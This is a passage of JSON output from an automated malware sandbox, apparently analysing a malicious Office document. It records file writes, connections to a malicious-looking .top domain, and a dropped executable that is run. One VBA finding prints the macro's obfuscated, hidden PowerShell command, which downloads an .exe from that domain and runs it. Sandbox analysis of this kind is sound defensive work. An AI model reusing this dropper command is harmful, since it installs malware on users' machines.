"hashes": [], "norm_filename": "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql70.xsl", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_44656", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql70.xsl\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl", "hashes": [], "norm_filename": "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql90.xsl", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_44665", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql90.xsl\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl", "hashes": [], "norm_filename": "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sybase.xsl", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_44676", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sybase.xsl\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\$Recycle.Bin\\S-1-5-21-1043267462-1935404232-549209582-1000\\desktop.ini", "hashes": [], "norm_filename": "c:\\$recycle.bin\\s-1-5-21-1043267462-1935404232-549209582-1000\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_masquerade", "category_desc": "Masquerade", "operation": "_change_folder_appearance", "operation_desc": "Change folder appearance", "ref_gfncalls": [ { "ref_id": "gfn_45093", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 2, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_change_folder_appearance", "technique_desc": "Folder \"c:\\$recycle.bin\\s-1-5-21-1043267462-1935404232-549209582-1000\" has a changed appearance.", "technique_path": "built_in._masquerade._change_folder_appearance.vmray_change_folder_appearance", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_document_create_process", "operation_desc": "Create process", "ref_gfncalls": [ { "ref_id": "gfn_45105", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_document_create_process", "technique_desc": "Create process \"C:\\Users\\YBZ8BT~1\\AppData\\Local\\Temp\\tmp81BC.tmp.bat\".", "technique_path": "built_in._process._document_create_process.vmray_document_create_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_create_many_files", "operation_desc": "Create many files", "ref_gfncalls": [], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_create_many_files", "technique_desc": "Create above average number of files.", "technique_path": "built_in._file_system._create_many_files.vmray_create_many_files", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_handle_with_malicious_files", "operation_desc": "Handle with malicious files", "ref_gfncalls": [], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_handle_with_malicious_files", "technique_desc": "File \"c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp13684.exe\" is a known malicious file.", "technique_path": "built_in._file_system._handle_with_malicious_files.vmray_handle_with_malicious_files", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_connect", "operation_desc": "Connect to remote host", "ref_gfncalls": [ { "ref_id": "gfn_1104", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 3, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_tcp_out_connection", "technique_desc": "Outgoing TCP connection to host \"54.205.205.46:80\".", "technique_path": "built_in._network._connect.vmray_tcp_out_connection", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [ { "operations": [ "get", "get", "get" ], "type": "url_artifact", "url": "weekendfakc.top/admin.php?f=2", "version": 1 } ], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_download_data", "operation_desc": "Download data", "ref_gfncalls": [ { "ref_id": "gfn_1109", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_download_data_http_request", "technique_desc": "Url \"weekendfakc.top/admin.php?f=2\".", "technique_path": "built_in._network._download_data.vmray_download_data_http_request", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [ { "operations": [ "get", "get", "get" ], "type": "url_artifact", "url": "weekendfakc.top/admin.php?f=2", "version": 1 } ], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_establish_http_connection", "operation_desc": "Connect to HTTP server", "ref_gfncalls": [ { "ref_id": "gfn_1109", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 2, "rule_type": "built_in", "rule_version": 1, "technique": "establish_http_connection", "technique_desc": "Remote address \"weekendfakc.top/admin.php?f=2\".", "technique_path": "built_in._network._establish_http_connection.establish_http_connection", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_pe", "category_desc": "PE", "operation": "_drop_pe_file", "operation_desc": "Drop PE file", "ref_gfncalls": [], "rule_score": 2, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_drop_pe_file", "technique_desc": "Drop file \"c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp13684.exe\".", "technique_path": "built_in._pe._drop_pe_file.vmray_drop_pe_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_pe", "category_desc": "PE", "operation": "_execute_dropped_pe_file", "operation_desc": "Execute dropped PE file", "ref_gfncalls": [], "rule_score": 3, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_execute_dropped_pe_file", "technique_desc": "Execute dropped file \"c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp13684.exe\".", "technique_path": "built_in._pe._execute_dropped_pe_file.vmray_execute_dropped_pe_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_vba", "category_desc": "VBA Macro", "operation": "_execute_application", "operation_desc": "Execute application", "ref_gfncalls": [], "rule_score": 2, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_execute_application", "technique_desc": "fftHtsjclCjUrnpphgRSnmHBbrHoXnEmqFLATJmVBnyGRk = \"powe\" + \"rshell -WindowStyle Hidden $nJThd = new-o\" + \"bject System.Net.WebClient;$kNpOYqxzAkL = new-o\" + \"bject random;$str = 'http://test.top/admin.php?f=2 ,http://test.top/admin.php?f=2 ' -replace 'test', 'weekendfakc'; $kCeRq = $str.Split(',');$name = $kNpOYqxzAkL.next(1, 65536);$CQxUPWselP = $env:temp + '' + $name + '.exe';foreach($dOpZTR in $kCeRq){try{$nJThd.DownloadFile($dOpZTR.ToString(), $CQxUPWselP);Start-Process $CQxUPWselP;break;}catch{write-host $_.Exception.Message;}}\"", "technique_path": "built_in._vba._execute_application.vmray_execute_application", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_vba", "category_desc": "VBA Macro", "operation": "_execute_application", "operation_desc": "Execute application", "ref_gfncalls": [], "rule_score": 2, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_execute_application", "technique_desc": "Set LyccVWxoXYubGToNLXHwsXVJVJgIjNdWElZb = CreateObject(\"WScript.Shell\")", "technique_path": "built_in._vba._execute_application.vmray_execute_application", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_vba", "category_desc": "VBA Macro", "operation": "_create_suspicious_com_object", "operation_desc": "Create suspicious COM object", "ref_gfncalls": [], "rule_score": 2, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_create_suspicious_com_object", "technique_desc": "CreateObject(\"WScript.Shell\")", "technique_path": "built_in._vba._create_suspicious_com_object.vmray_create_suspicious_com_object", "type": "vti_rule_match", "version": 1 } ], "vti_rule_type": "Documents", "vti_score": 100 }, "yara": { "apply_yara": true, "apply_yara_on_created_files": true, "apply_yara_on_modified_files": true, "apply_yara_on_pcap_file": true, "apply_yara_on_process_dumps": true, "apply_yara_on_sample_files": true, "match_count": 0, "matches": [], "ruleset_count": 7, "type": "yara", "version": 1 } }